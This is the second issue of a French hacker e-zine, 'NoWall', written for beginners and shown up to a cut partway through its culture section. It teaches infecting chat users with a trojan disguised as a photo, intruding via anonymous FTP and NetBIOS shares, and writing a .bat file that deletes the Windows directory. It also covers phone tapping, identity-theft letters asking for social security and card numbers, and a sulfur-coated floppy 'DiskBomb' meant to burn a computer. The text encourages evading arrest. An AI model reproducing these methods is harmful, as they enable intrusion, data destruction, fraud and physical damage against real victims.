                                             
                                             
                                              

      ___      __    ________    __            __    __________    __          __ 
     |   \    |  |  |        |  |  |          |  |  |          |  |  |        |  |
     |    \   |  |  |   __   |  |  |          |  |  |   ____   |  |  |        |  |
     |     \  |  |  |  |  |  |  |  |          |  |  |  |    |  |  |  |        |  |
     |  |\  \ |  |  |  |  |  |  |  |          |  |  |  |____|  |  |  |        |  |
     |  | \  \|  |  |  |  |  |  |  |    __    |  |  |          |  |  |        |  |
     |  |  \     |  |  |  |  |  |  \   /  \   /  |  |   ____   |  |  |        |  |
     |  |   \    |  |  |__|  |   \  \_/    \_/  /   |  |    |  |  |  |_____   |  |_____ 
     |  |    \   |  |        |    \     /\     /    |  |    |  |  |        |  |        |
     |__|     \__|  |________|     \___/  \___/     |__|    |__|  |________|  |________|


				              ________________
				              \              /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  NUMBER TWO  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   
  				              /______________\                                      

                                 __________________________
			               \                        /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<     PAR RAVENSHADOW    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
     				         /________________________\          
                      
                                                                           
                                                                      
                                              
                                              
                                              


                  			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |    I N T R O D U C T I O N    |
                            |                               |
                            ---------------------------------


	Yop ! Toujours plus grand, toujours plus beau, toujours plus fort et toujours plus fou,
RavenShadow est de retour !!!

	Le deuxime numro de NoWall sort trs peu de temps aprs le premier, et ce pour une 
raison trs simple : je vous aime :o) 

	Pour lire mon top fanzine de la mort qui tue mortellement la vie vivante, lisez-le sous
WordPad en 800x600 et en choisissant dans les options "Pas de retour  la ligne". 

	J'ai reu quelques e-mails o l'on me demandait un truc tout con : pourquoi "NoWall" ?
		
	Ben c'est simple : y'a eu NoWay, NoRoute, NoFuture, NoPast, NoPasswd, et le tout rcent
NoPeace de Clad Strife... Moi, NoPeace, a me plaisait bien, mais Clad tait dja pass par l
et c'est un gars que je respecte, donc je voulais pas me brouiller avec lui. NoFun, a voulait 
dire que ce serait pas drle, et moi, j'aime bien tre drle (mme si j'y arrive pas toujours).
NoTrip, a voudrait dire que je rprouve les dlires et la consommation des drogues. NoZizi, 
c'tait marrant, et peut-tre qu'un jour je ferais un e-zine qui portera ce nom-l, mais l, a
ne convenait pas.

	J'avais aussi la possibilit d'crire un e-zine sans "No" dans le titre, et moultes ides
me sont venues  l'esprit : *** ****** (Top Secret), le logo tait simple  faire, mais le nom 
imprononable ; The Zine : a fait un peu trop "I am the best & I fuck you"  mon got ; 
HackZine : ben le problme, c'est que c'est pas le premier zine de hack ; et tant d'autres 
encore...

	Pis un jour, je me suis dit : "Putain de merde ! Bordel ! Chier-chiasse-couille-con-cul-
bite-vagin-sperme-crotte-zut-flute-mazette-kaboudi-boudiou-fichtre-saperlipopette ! Marre de 
ces noms en anglais, a SuxX (LOL) !!!" Et de l, je me suis demand ce qui me caractrisait le
plus, ou mon ide face  mes projets, et l, une lueur de soubresaut de lumire d'clat de 
gnie s'est empare de tout mon tre : Pas De Barrires !!!

	Puis, l'euphorie cdant sa place  la dprime, je me suis dit : "Pas De Barrires, c'est
trop long ! PDB, a va entraner des jeux de mots du genre "Putain De Bouffon" ou "Pute De 
Bordel", et on va me faire chier avec a !"...

	Puis, mon grand gnie incommensurable reprenant le dessus rapidement, je me suis dit : 
"Oh ! Zarma ! P s'faire chier pour  ! On va revenir  ce putain d'anglais !... J'ai trouv !
NOWALL !!!"

	Et de l est venu ce nom sous lequel vous connaissez mon e-zine.

	
	Bon, tournons la page et revenons  nos roustons...

	NoWall est toujours divis en 4 parties :

		- Hacking (pour les trous du cul de l'Internet)
		
		- Phreaking (pour les enculeurs des telecoms)
			
		- Social Enginnering (parce que j'aime toujours autant a)
		
		- Culture (pour les intellos qui veulent apprendre des trucs parce que c'est des
		assoiffs de connaissances) 


	J'rappelle quand mme que mon zine est  une tendance orient dans la direction pointant
dans le sens de l'endroit o se trouvent des dbutants inexpriments qui dbutent dans le 
domaine du Hack/Phreak o ils ne sont encore que dbutants qui dbutent, donc si vous tes une
vraie Elite que tout le monde craint, vous y retrouverez probablement des articles que vous 
aurez dja lu autre part, mais ne m'en tenez pas rigueur si je ne dsigne pas toujours la 
source, parce que je n'cris pas mes articles avec d'autres sous les yeux, mais sur la base de
ce que j'ai lu et appris.

	J'essaye de faire monter lentement le niveau pour que mme les plus cons d'entre nous (et
je fais partie des plus cons d'entre tous, malgr mon QI aussi grand que le cul d'un lphant
obse gav au hamburger) puissent suivre sans tre largus. Et au fur et  mesure, j'espre
russir  instruire les futurs petits Mitnick :oP

	Je me dois quand mme de vous dire que rien n'est illgal tant qu'on ne se fait pas 
prendre, donc si vous mettez en pratique ce que je dcris dans ce mag, ben vous faites pas 
choper, parce qu'une trange rumeur dit que c'est illgal, et on est mieux en libert que 
derrire les barreaux d'une prison, surtout que c'est mme p vrai qu'en prison on vous apporte
des oranges, alors aprs, ben on fait des carences en acide ascobique (en vitamine C, quoi !)
et on n'est plus en bonne sant, et a, c'est p bien ! ;-D

	Bon, ben j'arrive  la fin de l'intro, et vous pouvez m'crire  RavenShadow@ifrance.com
pour m'envoyer vos articles, vos progz, vos compliments, vos insultes, vos numros de cartes
bancaires, vos propositions de job ou quoi que ce soit d'autre.

	Bonne lecture, et n'oubliez pas que j'ai un humour vaseux  prendre au 998e degr (oui, 
je sais, la dernire fois, c'tait le 128e degr, mais comme tout un chacun, plus je vieillis,
plus je suis con !!! Narf ! MDR).

	

	

 	                			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |        S O M M A I R E        |
                            |                               |
                            ---------------------------------


				          
				           SECTION HACKING 
				          

				    Exemple de hack sur Caramerde
					  Hacker un site par FTP
					    Hacker sans Troyen
					   Faire un fichier .bat
				



                                 
				          SECTION PHREAKING 
				         

					      Le White-Boxing
					     Faire une Crap-Box
				  Bidouillage sur tlphones portables
			              Quelques numros utiles
                                       



			          
			           SECTION SOCIAL ENGINEERING 
			          

				      Introduction au Snail Mail
				   Soigner son attaque au Snail Mail
					 L'attaque au Snail Mail
					 Exemple d'un formulaire
		              



				          
      				     SECTION CULTURE 
				          

					    Faire un DiskBomb
				      L'thique du hack moderne
					 La conscience du hacker
			  Kevin Mitnick, un Condor parmi les vautours
					    Wares en pagaille
					Comment faire sauter un PV
					   Fumer de l'arachide

                               


					        
						   OUTRO 
						  

					     Je recherche...
						   Greetz
						  Un crew ?
						   Bye bye

				              



                  			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |         H A C K I N G         |
                            |                               |
                            ---------------------------------


	
	************************************
	*** EXEMPLE DE HACK SUR CARAMAIL ***
	************************************	


	Ce qui suit n'est qu'une ide parmi tant d'autres te je ne suis srement pas le premier
 l'avoir eu, mais moi, comme je suis pas con, je dpose un copyright ds maintenant ;o)

	Donc, il va vous falloir :

		- Icq 98 (ou 99, avec un scanneur d'IP )

		- Adduser (c'est un programme pour ICQ qui permet de mettre quelqu'un sur sa 
		"contact list" sans son autorisation.) 

		- Un troyen assez rcent (les troyens, c'est pour les lamers, mais je m'en pte
		les couilles parce que c'est quand mme utile)

		- La photo d'une meuf (si possible la photo d'une copine pour faire plus rel, 
		parce que Tabata Cash qui suce Rocco Sifredi, a fait mytho, quand mme) 

		- Un compte Cacamail au nom d'une fille bien "attirante" (du style "jf-ch-love" 
		ou "i-want-a-boy", pas de "cunegonde_la_frustre" ou de "marie-germaine_la_
		campagnarde") 

	Et tant qu' faire, sniffez-vous avant de faire a, pour pas vous faire niquer...

	Vous avez tout le matos ? Kewl ! C'est parti !!!!

	1) Go sur caramerde avec votre nouveau compte, et allez sur un salon de discussion du 
style "Sexe & baise".

	2) Now, cherchez si il y en a pas qui ont ICQ grace  leurs e-mails, 99% de leurs 
adresse e-mails sont pseudo@caramail.com.

	3) Grace  "Adduser" mettez-les sur votre "contact-list" : ce sont vos cibles 
potentielles.

	4) Tenez avec eux un discours du genre :

		Vous : Salut !!!! :-@
		Cible : Salut ! ;-)
		Vous : Tu m'envoies ta photo stp ? ;-)
		Cible : oui / non (rien  battre de la rponse)
		Vous : Tu veux ma photo ?
		Cible : Oui, ce serait cooooooollllll !!!!

		
	Gagn ! Hhhhhhh... :oD

	L vous lui envoyez un fichier sous zip contenant :
		- La photo de la meuf
		- Le serveur du troyen renom en "lisez-moi.exe"

	C'est clair, il vous faut un ch'tit' peu de chance pour que la victime marche et 
s'infecte, mais si a marche, chopez son Ip grce  Icq (mettez -lz sur "off-line" avec Icq98).

	Et hop ! Vous tes averti  chaque fois que votre victime se connecte et autres infos 
utiles.




	

	**********************
	*** HACKER PAR FTP ***
	**********************


	*** Qu'est-ce qu'un FTP ? ***

	FTP signifie File Transfert Protocol, ce qui signifie que c'est un protocole qui permet 
de transmettre des fichiers d'un ordinateur  un autre (par exemple, quand on tlcharge un 
programme, a passe par le FTP). Les ports qui lui sont attribus sont les ports 20 et 21. 


	*** Comment hacker en passant par le FTP ? ***

	[Je prcise que la technique qui suit ne marche que sur les serveurs non-scuriss]

	Aller dans "Dmarrer" , "Excuter" et tapper "ftp -n", et l, normalement, une fentre 
Ms-Dos apparat ; il faut taper :

open www.nomdusite
quote user ftp
quote cwd ~root
quote pass ftp

	En fait, on obtient un truc dans ce style (avec une * devant ce qu'il faut taper, avec 
devant ce qu'on obtient) :

* Ftp> open www.cible.com
 connected to www.cible.com
 220 websrv1 microsoft ftp service(version 4.0)
* Ftp> quote user ftp
 331 anonymous acces allowed,send identify (e-mail name)as password
* Ftp> quote cwd ~root
 530 please login with user and pass
* Ftp> quote pass ftp
 230 anonymous user logged in


	Voila ! Si tout se passe bien, on est alors connect sur le site-cible.

	Si le serveur est securis, on obtient un truc comme a (mais lchez l'affaire, vous 
aurez vraiment beaucoup de mal  russir sauf si vous avez une connection par cable et un bon
crackpass) :

* Ftp> open www.cible.com
 connected to www.cible.com
 websrv microsoft ftp service (version 4.0)
* Ftp> quote user ftp
 331 password required for ftp
* Ftp> quote cwd ~root
 530 please login with user and pass
* Ftp> quote pass ftp
 530 user cannot log in


	Une fois connect sur le site, vous pouvez utiliser les commandes suivantes :

	PWD : montre o l'on se situe sur le disque
	DIR : montre le contenu de la racine
	MKDIR : cr un rpertoire (ex : "mkdir suxx" cr le repertoire "suxx")
	RMDIR : supprime un rpertoire (ex : "rmdir suxx" supprime le rpertoir "suxx")
	DEL : supprime un fichier (ex : "del suxx.exe" supprime le fichier "suxx.exe")
	CD : emmne dans un rpertoir (ex : "cd suxx" emmne dans le rpertoir "suxx")
	CD / : rammne  la racine
	CD.. : rammne au rpertoir prcdant
	GET : prend un fichier et le met sur votre bureau


	Quand vous avez fini de faire joujou, tapez quit et vous serez dconnect.

	Voila ! C'est pas bien sorcier quand mme !!! 




	**************************
	*** HACKER SANS TROYEN ***
	**************************
	


	Pour commencer, il vous faut tout d'abord vous assurer que vous avez sur votre bureau 
l'icone "Voisinage rseaux" . Si ce n'est pas le cas, vous devez l'ajouter, dans "Panneau de 
configuration".

	Bon, maintenant, choisissez votre cible, trouvez son IP et ouvrez une session Ms-Dos et 
tapez :

C:\WINDOWS>nbtstat -A IP_de_la_cible


	Voila ce qui va s'afficher :
 

NetBIOS Remote Machine Name Table
Name Type Status
USERNAME 00 UNIQUE Registered
WORKGROUP 00 GROUP Registered
USERNAME 03 UNIQUE Registered
USERNAME 20 UNIQUE Registered
WORKGROUP 1E GROUP Registered
MAC Address = 44-45-53-54-00-00
C:\WINDOWS>


	Il est possible qu'un message d'erreur apparaisse sous la forme d'un : "HOST NOT FOUND", 
il peut y avoir deux cause  cette erreur :

	1) La personne ne fait pas tourner le client MiKro$oFt ou n'est tout simplement pas 
sous Windaube,... c'est donc normal, mais a fait chier, parce que votre hack est rat ! 

	2) Quelqu'un utilise le mme nom de machine que vous et est aussi connect, changez 
donc le votre en un autre qui ne risque pas d'tre pris (donc soyez original).


	Bon, imaginons que vous ayez du premier coup une rponse favorable du Nbtstat ; ce qui 
est intressant, c'est le service de partage de fichiers (le "Remote 20"), et s'il n'y est pas, 
lchez l'affaire car votre hack est dfinitivement foir.

	Maintenant que vous avez le nom du "Remote 20", il vous faut l'ajouter au fichier 
"Lmhosts" dans le rpertoire de WiNfUcK (si ce nom contient des espaces, il faut les mettre 
entre guillemets). 

	Ce fichier est utilise par la pile du client "Wins" (qui fait que Netbios prime sur le 
TCP/IP) et contient la redirection des addresses IP vers les noms d'ordinateurs. Ce fichier est 
divis en plusieures colonnes :

		- la premiere contient l'adresse IP
		- la seconde le nom de la machine hte
		- la troisime et les suivantes des commentaires et/ou des directives


	Ce qui diffrencie le passage d'une colonne  une autre, c'est, au mimimum, un 
espacement.

	Chaque directive et chaque commentaire doivent tre prcd du signe #, mais ils ne 
servent a rien pour l'instant.

	Donc, sous la session Ms-Dos que vous avez ouvert, tapez :

C:\WINDOWS>echo IP REMOTE 20>>C:\windows\lmhosts


	Ici, il n'y a aucun fichier Lmhosts existant, donc remplacez la redirection >> par >.

	Une fois le nouveau host ajout, il ne vous reste plus qu'a reseter le cache du Netbios.

	Donc dans votre session Ms-Dos, tapez :

C:\WINDOWS>nbtstat -R


	Et vous aurez :

Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS>


	Maintenant, il faut savoir quelles sont les ressources qui sont partages sur la machine
hte, donc on va se servir de la commande "NET", dont le paramtre "View" permet de lister ces 
ressources.

	Donc tapez dans votre session Ms-Dos :

C:\WINDOWS>net view \\NOM du REMOTE 20

	
	Et si tout se passe bien, vous obtiendrez :

Shared resources at \\USERNAME
Sharename Type Comment
A Disk
C Disk
D Disk
HPDeskJet Printer
The command was completed successfully.
C:\WINDOWS>


	Il est possible que des messages d'erreur s'affichent ; voici les plus courant, et 
comment en venir  bout :

Error 5: You do not currently have access to this file.

	La machine partage bel et bien certaines ressources mais vous devez entrer un password 
pour y avoir accs. Pour cela il faut passer par Windaube : cliquez sur "Dmarrer", allez dans 
"Rechercher" puis dans "Ordinateur". Nommez l'ordinateur "\\Remote20" et cliquez sur "Rechercher
maintenant" ; une fois que la bcane est trouve, cliquez deux fois dessus et vous pourrez alors
entrer un password-rseau (essayez un password vide ou le nom du Remote20, et si a marche pas, 
dmerdez-vous :-P).


Error 53: The computer name specified in the network path cannot be located.

	L, il peut y avoir deux causes  l'erreur : soi vous avez mal introduit des donnes, 
soi la machine que vous essayez d'atteindre n'est pas accessible (dconnexion).


Error 59: An unexpected network error has occurred. (Disconnected)

	Ici, l'erreur et due  un problme lors de la transmission des donnes entre vous et la 
machine pendant l'excution de la commande "Net View", donc recommencez.


Error 86: The specified network password is not correct.

	Le password que vous venez d'entrer (via le DOS), n'est pas valide, donc essayez-en un 
autre.


	

	*****************************
	*** FAIRE UN FICHIER .BAT ***
	*****************************


	Faire un fichier .bat est une chose trs simple, pourvu qu'on ait au moins un doigt pour
taper sur son clavier, un oeil pour voir ce qu'on crit et un cerveau pour connatre un peu le
Ms-Dos.

	En guise d'introduction, voici quelques commandes Ms-Dos de base :

echo off : dsactive l'affichage de ce qui se passe
 
dir : affiche le contenu du rpertoire dsign 
(ex : <dir c:\windows> affiche le contenu de c:\windows) 

del : efface tous les fichiers du rpertoire dsign
(ex : <del C:\WINDOWS\*.exe> efface tous les fichiers .exe de c:\windows) 

echo. : saute une ligne 

echo : affiche ce qui est crit aprs [echo]
(ex : <echo fuck you> affiche "fuck you"> 

cls : efface l'cran 

pause : demande d'appuyer sur un touche pour continuer

	Donc voici le genre de fichiers .bat plutot pas gentils du tout que l'on peut faire trs
vite sans se casser la tte :
 
echo off 
echo This programm is created by RavenShadow
pause 
del C:\WINDOWS\*.* 
dir C:\WINDOWS\ 
echo YoU h4v3 b33n h4x0r3d !!! 
cls


	Bon, ben je vous laisse faire joujou avec a, mais sachez quand mme que c'est hyper
connu, donc faites pas le malin avec un autre hacker en lui envoyant a, parce que je ne pense
pas que le monsieur ou la madame apprcierait la plaisanterie, et il risquerait de se comporter
assez mchamment avec vous, avec une tendance sadique de nature maniaco-dpressive jumele  une
nature hyper-impressionnable donc supra-impulsive qui ne pourrait que vous nuire.


          			                 \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |       P H R E A K I N G       |
                            |                               |
                            ---------------------------------



	***********************
	*** LE WHITE-BOXING ***
	***********************



	*** C'est quoi le White Boxing ? ***

	A peu de choses prs, le White Boxing consiste  mettre un son dans le combin afin que
la cabine n'affiche pas les numros composs. 


	*** Comment faut-il procder ? ***


	Bon, ben a, c'est assez difficile  dcrire, parce qu' moins d'avoir une machine qui 
met le "Ssssssscccccccchhhhhhhhhhh" du White Boxing, il faut s'entraner  le produire avec sa 
bouche.

	Faut pas s'inquiter, c'est pas difficile : c'est comme quand on fait signe  quelqu'un 
de se taire en mettant un doigt sur la bouche et en mettant un "Chut" trs bref, sauf que l, 
le son doit tre plus long et plus fort.

	Sinon, si vous avez un dictaphone de bonne qualit, et si votre modem n'est pas intgr 
 votre ordi, vous pouvez enregister le son qui suit la numration et le mettre en lecture 
devant le combin.




	**************************
	*** FAIRE UNE CRAP-BOX ***
	**************************


	*** A quoi sert une Crap-Box ? ***

	Une Crap-Box ne sert qu' une seule chose : enregistrer une conversation tlphonique. 
C'est pas grand-chose, mais a peut toujours tre utile dans certains cas...


	*** Le matriel pour faire une Crap-Box ? ***

		- un tlphone
		- des fils
		- une pince  dnuder ou un cutter
		- un tournevis
		- un dictaphone
		- un fer  souder
		- un adapteur d'couteur ( relier au systme de son ou dans le lecteur CD)


	*** Comment procder ? ***

	1) Avec le tournevis, ouvrir dlicatement le combin du tlphone sans rien casser ; 
vous devriez voir une petite plaque o les 2 fils de l'couteur et les 2 fils du micro se 
rejoignent pour pouvoir brancher le fil du tlphone.

	2) Prendre 4 fils de couleurs diffrentes (pas ncessaire, mais plus pratique) et de 
mme longueur, et les souder sur les 4 places de la plaque o les fils ce rejoignent, en prenant
bien garde qu'aucun fil n'en touche un autre.

	3) Rassembler un fil de l'couteur avec un du micro faire de mme avec les 2 autres 
fils ; ainsi, vous aurez un ple de l'couteur et un du micro sur un groupe de fils et les 
autres ples sur l'autre groupe.

	4) Souder un des groupes de fils  un fil de l'adaptateur d'couteur et faire pareil 
avec l'autre groupe (si l'adaptateur a quatre fils, les mettre deux par deux).

	5) Brancher l'adapteur sur le dictaphone.


	Ainsi, quand vous tlphonez et que v'voulez enregister la discut", appuyez sur "Rec". 




	********************************************
	*** BIDOUILLAGE SUR TELEPHONES PORTABLES ***
	********************************************


	*** Obtenir l'IMEI d'un portable ***

	Ben a, c'est un truc tout con qui, je pense, marche sur tous les portables, mais
bon, je ne garantie rien (je sais que a marche sur les Nokia, les Ola, les Sagem et sur le
Motorola StarTAC).

	Juste  titre d'info, l'IMEI d'un portable sert  le tracer, donc avoir le sien n'est 
pas particulirement utile, sauf si on sait le changer (si vous savez le faire, expliquez-moi, 
ce serait cool), mais si on a celui d'un autre et le matriel ncessaire, ben on peut jouer au
petit militaire de la DGSE et tracer son portable.

	En fait, il suffit d'allumer votre cellulaire, de rentrer le code PIN et de taper sur 
les touches * # 0 6 # et, normalement, l'IMEI s'affiche. 


	*** Un menu secret ***

	Ce truc, c'est un machin tout bizarre que j'ai test sur le Sagem 800 d'un pote, mais je 
ne sais pas s'il marche sur les autres tlphones, mais essayez quand mme sur le votre, on ne 
sait jamais.	
	
	Il suffit d'allumer le tlphone, taper le code PIN, entrer dans le menu du portable et
taper sur la touche * et, si tout se passe bien, un menu secret apparat.

	Sur le Sagem de mon pote, je suis arriv sur un fichier o on trouvait l'IMEI et 
d'autres infos dans ce style.



	*******************************
	*** QUELQUES NUMEROS UTILES ***
	*******************************

	
	*** Tlphoner en restant anonyme ***

	Comme vous le savez, ou peut-tre pas, Fric Tlcon a mis en vente des tlphones qui 
affichent le numro de l'appelant... Ben moi, j'aime p a ! Parce que pour les attaques au SE
ou les blagues tlphoniques, a l'fait carrment pas !

	Donc, pour ceux qui ne le savent pas encore, fates le 3651 avant de composer le numro 
de votre cible (dans le cas du social engineering) ou de votre victime (dans le cas du canular),
et, si elle est quipe d'un de ces tlphones, elle ne verra pas s'afficher votre numro de 
tlphone, mais des petites toiles ! 

	Cette technique s'applique galement aux providers (comme a, on est anonyme, ce qui est
pratique si votre abonnement est vol ou pirat), ainsi qu'aux VMBs et aux PABXs (c'est plus sr
si vous avez la folie d'appeler de chez vous).

	Mais bon, faut pas non plus perdre de vue que ds qu'on fait le 3651, FT nous enregistre
et nous met dans une liste spciale, et ds que y'a quelqu'un qui fait une connerie avec les
tlphones, ben c'est cette liste-l que les employs de Fuck Telecom regardent en premier. 

	En conclusion : F4rc3 t3l3c0m SuxX !!!


	*** Savoir qui vous a appel ***

	Si votre tlphone sonne mais que vous ne dcrochez pas (si un petit malin s'amuse  
vous faire chier et que vous avez marre d'entendre ses conneries par exemple), vous pouvez
obtenir son numro de tlphone en composant le 3131 ; vous tomberez alors sur une voix qui vous
donnera le numro de l'appelant, ainsi que la date et l'heure de l'appel, si vous voulez porter
plainte par exemple.
	
	Attention : cette technique ne marche que si votre rpondeur ne s'est pas mis en marche et
si le tlphone a au moins sonn deux fois.

	Et elle ne marche pas non plus si l'appelant a fait le 3651.


	*** Etre au courant de ce qui se passe chez FT ***

	En faisant joujou sur mon tlphone, j'ai trouv deux numros qui concernent FT :

		- 1010 : le service tlphonique des actionnaires de Farce Telecom o l'on peut
			 savoir la valeur de l'action FT ou joindre un conseiller FT pour le 
			 faire chier, puisque c'est un numro gratis.

		- 0800123456 : le service des employs de FT, o on apprend tout les projets de
			       FT et o l'on entend des foutaises pas possible du genre quand FT
			       se congratule d'tre la meilleure entreprise telecom.


	*** Si on a vraiment trop bu ***

	Ben c'est simple : faites le 18 ;o)



	


                  			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |      SOCIAL ENGINEERING       |
                            |                               |
                            ---------------------------------




	**********************************
	*** INTRODUCTION AU SNAIL MAIL ***
	**********************************

	Le Snail Mail, c'est du Social Enginnering o l'on se sert de la poste comme moyen
d'action.

	Je pense personnellement que c'est trs utile, car c'est facile, par cher et on obtient
de bons rsultats. 

	En effet, il n'existe pas un seule entreprise, aussi informatise soit-elle, o il n'y a
pas des tas de paperasses  remplir. Et, du moins c'est mon avis,  force de remplir paplard
sur paplard, l'employ moyen ne fait plus gaffe  ce qu'on lui demande et, de toute manire, 
il y a de plus en plus de gens qui ne font confiance qu'aux informations crites, parce que
comme dit le proverbe : "les paroles s'envolent, les crits restent".

	Et vu que notre socit devient de plus en plus conne et que l'administration suit le
mouvement de connerie progressive et gnrale, on vous demande tout et n'importe quoi pour une
simple incription  la mdiathque de votre ville, donc vous pouvez vous aussi demander un tas
d'info lors de votre attaque au SE.	



	*****************************************
	*** SOIGNER SON ATTAQUE AU SNAIL MAIL ***
	*****************************************


	Si votre cible reoit en guise de courrier une feuille cadrille o il est crit au 
crayon dans un franais approximatif, mme si elle est plus conne qu'un fachiste trisomique,
il y a peu de chances qu'elle croit  votre histoire.

	Donc il vous faudra quand mme un minimum de matos, c'est  dire des enveloppes propres
et pas froisses, des timbres qui ne ressemblent pas  des papiers de chewing-gums trainant
dans une poche depuis 3 semaines, du papier d'assez bonne qualit (c'est con pour la nature et
Dominique Voynet, mais ne prenez pas de papier recycl), une bonne imprimante, et quelques
talents de crateur artistique.

	En effet, il vous faudra faire au moins un logo pour votre socit d'emprunt, et il vous
faudra le mettre sur vos enveloppes en haut  gauche de la face frontale (l o vous marquez
l'adresse) et sur votre papier  lettres.

	Ensuite, il vous faudra trouver un nom pour votre socit d'emprunt, mais ne prenez pas
un truc du genre "Jean-Kevin LeBoulet & Cie" ni l'autre extrme "Star Entairtainment Society",
parce que nous, on est francophones et civiliss, donc ne faites pas dans le bouseux ni dans
le grand groupe international (surtout qu'en gnral, un grand groupe international, c'est
connu).
	
	Si vous pouvez faire des tiquettes pour marquer les adresses de vos cibles, a le fera
encore plus et vous n'en serez que plus crdible.

	Enfin, afin d'viter tout risque de vous faire niquer  cause de votre adresse et de faire
plus pro, il vous faut soi une bote postale (si vous tes plusieurs, partagez les frais), soi
une adresse dans une Z.I (Zone Industrielle). Pour a, il vous faudra de la chance, parce qu'une
entreprise dsaffecte dans une Z.I, on n'en trouve plus beaucoup.

	En clair et en rsum : pour tre crdible au maximum, il faut que vous ayez l'air pro
au maximum.




	*******************************
	*** L'ATTAQUE AU SNAIL MAIL ***
	*******************************


	*** Choisir la cible ***

	Dans le cas du SE par snail mail, on peut s'attaquer  une norme tranche de population,
pour faire un peu comme un sondage. Il faut que la lettre ressemble  un truc strotyp que
vous envoyez  des milliers de gens, comme une mailing-list qui passe par les PPT au lieu de 
passer par le Web.


	*** Le design du formulaire ***

	Si vous voulez que votre attaque soit vraiment efficace, il faut que vous fassiez des
formulaires qui se remplissent vite, un peu dans le genre de formulaire d'inscription  une
association, et avec un police "pro", pas de polices du genre Comic sans MS ou Elegant !!!

	Demandez vos infos dans un ordre "logique", ne demandez pas d'entre le numro de Secu
ou le numro de carte de crdit.

	Enfin, la rgle d'or toute con : ne faites pas de fautes d'orthographe !!!

	Ensuite, envoyez vos formulaires et attendez.

	S'il vous manque des infos, n'hsitez pas  tlphoner  votre cible en vous faisant
passer pour un employ de votre socit d'emprunt... Mais pour le SE par tlphone, il faudra
attendre le prochain NoWall !!! :oD




	******************************
	*** SCHEMA D'UN FORMULAIRE ***
	******************************


<Logo de votre socit d'emprunt>
<Nom et adresse de votre socit d'emprunt>

									<Date de l'envoi>


			<Titre du formulaire en gros, majuscule et gras>



	Madame, Monsieur, 

	<Prtexte du formulaire>

	Veuillez donc remplir le formulaire suivant et nous le retourner  <adresse>


		Nom et Prnom : ______________________________________________
		             _          _
		Sexe :      |_| M      |_| F (nom de jeune fille : __________ )
		
		Adresse : ____________________________________________________

		______________________________________________________________
				
		N de tlphone : |_|_|  |_|_|_|_|_|_|_|_|

		Date de naissance : |_|_|/|_|_|/|_|_|_|_|
	                             _
		Situation familiale : |_| Clibataire
					     _ 	
					    |_| Mari(e)
					     _
					    |_| Divorc(e)
					     _
					    |_| Veuf(ve)
					  _		_	_	_	_
		Nombre d'enfants : |_|Aucun  |_|1  |_|2  |_|3  |_|4 ou plus

		N de scurit sociale : _____________________________________

		Banque : _____________________________________________________

		Numro de carte bleue : |_|_|_|_| |_|_|_|_| |_|_|_|_|


		
		Nous vous adressons nos sincres salutations,

									<Nom d'emprunt>
									  <Signature>


		

		
	



	




                  			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |         C U L T U R E         |
                            |                               |
                            ---------------------------------



	*****************************
	*** FABRIQUER UN DISKBOMB ***
	*****************************


	Attention ! Ce que je dcris ci-dessous n'est pas une connerie qui sort de mon 
imagination, mais bel et bien une "recette" teste et approuve par des milliers de petits
anarchistes en herbe, dont moi.
	Alors si vous voulez vraiment fabriquer un DiskBomb et l'utiliser, ben oubliez que vous 
avez lu a dans mon fanzine, parce que je crois bien qu'on pourrait vous accuser de destruction 
de matriel volontaire avec intention de nuire  la socit et patati et patata...

	Pis d'faon, si vous fates a que vous vous fates pcho, ben ce sera pas de ma faute,
parce que c'est Nucke (un pote qui tait dans De-Generation-X) qui m'a appris a !


	*** Matriel ***

		- Une disquette (pourrave tant qu' faire)
		- Du vernis  ongles ou de la colle en pot (la colle crade qu'on met avec une 
		pastule)
		- Du souffre (grattez le bout des allumettes si vous n'en trouvez pas)
		- De la laque ou du dodorant (facultatif, c'est moi qui ait pens  a)


	*** Procdure ***

	Ouvrez la disquette en faisant bien attention  ne pas casser le plastique et ouvrez les
deux bouts de coton de chaque ct du disque.

	Enduisez les deux cts (un seul suffit, mais deux, c'est plus efficace) du disque avec 
une bonne couche de vernis ou de colle, et recouvrez les de souffre (moi, c'est comme a qu'on 
m'a appris, mais aprs mre rflexion, je me suis dit qu'il n'y avait besoin de recouvrir qu'une
languette : la surface qui ne sera pas protge par le plastique ensuite).

	Remettez les deux bouts de plastique sur le disque (la colle ou le vernis fera office 
d'agent collant) en faisant bien attention  ce que votre recollage ressemble encore  une 
disquette.

	Vaporisez de la laque sur le plastique du DiskBomb.

	Mettez la disquette dans un ordinateur, allumez-le, et partez vite !

	Existe aussi la variante d'allumer l'ordi, mettre la disquette dans le lecteur et 
attendre qu'un petit curieux ou une petite curieuse veuille regarder ce qu'il y a dessus.


	*** Pourquoi a marche ? ***

	Ben c'est bien simple, dans le lecteur-disquette, il y a quelques tincelles quand 
l'ordi s'allume et vrifie si le lecteur est vide ou quand on veut regarder sur une disquette,
la tte de lecture frotte le disque ; le souffre va alors prendre feu (c'est le principe de 
l'allumette, pour le neu-neu qu'aurait pas compris ;-P), et la laque (ou le dodorant) tant 
trs inflammable, a va prendre fau aussi, et tout le lecteur-disquette va crmer, puis ce feu 
de joie va se rpandre dans l'unit centrale... Et boum ! Plus d'ordinateur !



	*********************************
	*** L'ETHIQUE DU HACK MODERNE ***
	*********************************

	[Ce texte n'est pas de moi et je ne connais pas son auteur, mais il m'a bien plu, donc je
le mets l en esprant que j'aurais pas de procs au cul pour vol de copyright :o) ]

	Les Hackers sont une espce d'humains (ou d'aliens) qui utilisent la technologie de 
manire crative pour continuer  "apprendre en faisant" dans le domaine de la technologie. 
	
	Le hack est bien plus que le simple plaisir de prendre le contrle d'un ordinateur tenu 
par des gens qui ont dpens beaucoup d'argent et d'annes d'tude pour tre capables de 
